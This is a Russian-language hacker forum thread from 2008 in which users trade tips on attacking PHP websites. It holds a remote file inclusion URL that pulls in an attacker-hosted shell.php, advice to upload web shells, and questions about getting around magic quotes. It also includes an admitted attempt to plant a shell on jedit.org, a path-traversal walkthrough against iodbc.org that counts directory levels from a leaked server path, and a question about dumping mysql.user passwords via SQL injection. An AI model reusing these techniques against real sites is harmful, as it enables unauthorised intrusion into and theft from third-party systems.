01.04.2008, 19:51
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
urk access disabled выставляется в php.ini
пример http://www.1gb.ru/phpinfo.php ищи строчку allow url open там написано on, значит разрешено. это распространяется на include fopen и все подобные файловые ф-ии которые умеют открывать файлы удаленно, тип запроса не играет роли
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
01.04.2008, 20:03
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами:
9849598
Репутация:
126
|
|
Сообщение от blackybr
urk access disabled выставляется в php.ini
пример http://www.1gb.ru/phpinfo.php ищи строчку allow url open там написано on, значит разрешено. это распространяется на include fopen и все подобные файловые ф-ии которые умеют открывать файлы удаленно, тип запроса не играет роли
наверное не urk а url 
blackybr: ага, описался.
Последний раз редактировалось blackybr; 01.04.2008 в 20:25..
|
|
|
|
01.04.2008, 20:31
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
ВаааЪ пасибки пиплы ^_______________^. Слышал тут про магические кавычки - иё обойти есь шанс о_О ? (Для будущиx восxождений:Р=
|
|
|
|
01.04.2008, 20:58
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9541076
Репутация:
82
|
|
http://site.com/index.php?page=http://site.ru/shell.php?
или просто залей шелл с нужным раширением
|
|
|
|
01.04.2008, 22:52
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Ясненько. Кстати , blackybr , Я пытался залить шелл на www.jedit.org, а не сурсфорджнет))
|
|
|
|
01.04.2008, 22:56
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
он хостится на сурсфордже.
jedit.sourceforge.net
jedit.org
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
01.04.2008, 23:28
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
ой....Надеюсь, ты меня простил))). И ещё я надеюсь,шо вы не против моих вопросов(пусь и тупых ну что поделаешь...дубина я такая( ). Вот есь сайт
www.iodbc.org
Глобальный инклуд не сделать, а знач и шелл не залить(.если передать кавычку,выдаст путь,и ошибку:
http://www.iodbc.org/index.php?page=index
Выдало вот:
Oi!
Please test index.php instead of index.html!
Появились ещё вопросы:
1. Как узнать, какой путь использывать, и к каким файлам( где достать).
2.Как правильно обходить каталог ? подставляя всякие там ../ или ../../../
Я понял,что ../ это переход на уровень выше, но как определить, сколько их там,и какие файлы запрашивать ? Ведь например ../../etc/pwd и ../../../../../etc/pwd не тоже самое ?))). Запутался я.............
Warning: readfile(index.php.html) [function.readfile]: failed to open stream: No such file or directory in /dbs/iodbc/public_html/www.iodbc.org/index.php on line 138
Даёт это что-то ?))
Подставил без расширения существующий фаил index.php:
|
|
|
|
02.04.2008, 01:34
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
В связи с неизвестной продолжительностью - неправильно задал наверное перебор - мошь долго слишком. Напиши на 292-514-125 - разберэмся )
|
|
|
|
02.04.2008, 02:28
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
Warning: readfile(index.php.html) [function.readfile]: failed to open stream: No such file or directory in /dbs/iodbc/public_html/www.iodbc.org/index.php on line 138
ты в /dbs/iodbc/public_html/www.iodbc.org/
четыре уровня, т.е. ../../../../ и ты в корне. правда тут мэджики.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
02.04.2008, 08:00
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
иногда попадаются sql inc, где есть доступ к mysql.user,узер выводится рут,а пароль нет почему? пароли другиъ пользователей из mysql.user выводятся
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
